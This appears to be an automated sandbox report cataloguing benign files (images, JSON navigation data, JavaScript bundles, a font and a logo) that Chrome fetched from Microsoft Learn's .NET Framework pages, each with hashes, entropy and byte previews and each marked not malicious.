                                                                                                                                                                                            Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13842
                                                                                                                                                                                            Entropy (8bit):7.802399161550213
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                            MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                            SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                            SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                            SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                            Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):33148
                                                                                                                                                                                            Entropy (8bit):4.917595394577667
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                            MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                            SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                            SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                            SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):5644
                                                                                                                                                                                            Entropy (8bit):4.785769732002188
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                            MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                            SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                            SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                            SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                            Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):35005
                                                                                                                                                                                            Entropy (8bit):7.980061050467981
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                            MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                            SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                            SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                            SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                            Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4897
                                                                                                                                                                                            Entropy (8bit):4.8007377074457604
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                            MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                            SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                            SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                            SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                            Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1173007
                                                                                                                                                                                            Entropy (8bit):5.503893944397598
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                            MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                            SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                            SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                            SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):33370
                                                                                                                                                                                            Entropy (8bit):7.973675198531228
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                                            MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                                            SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                                            SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                                            SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2024.jpg
                                                                                                                                                                                            Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1817143
                                                                                                                                                                                            Entropy (8bit):5.501007973622959
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                            MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                            SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                            SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                            SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1432
                                                                                                                                                                                            Entropy (8bit):4.986131881931089
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                            MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                            SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                            SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                            SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1154
                                                                                                                                                                                            Entropy (8bit):4.59126408969148
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                            MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                            SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                            SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                            SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                            Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):19696
                                                                                                                                                                                            Entropy (8bit):7.9898910353479335
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                            MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                            SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                            SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                            SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                            Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):33148
                                                                                                                                                                                            Entropy (8bit):4.917595394577667
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                            MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                            SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                            SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                            SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                            Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):35005
                                                                                                                                                                                            Entropy (8bit):7.980061050467981
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                            MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                            SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
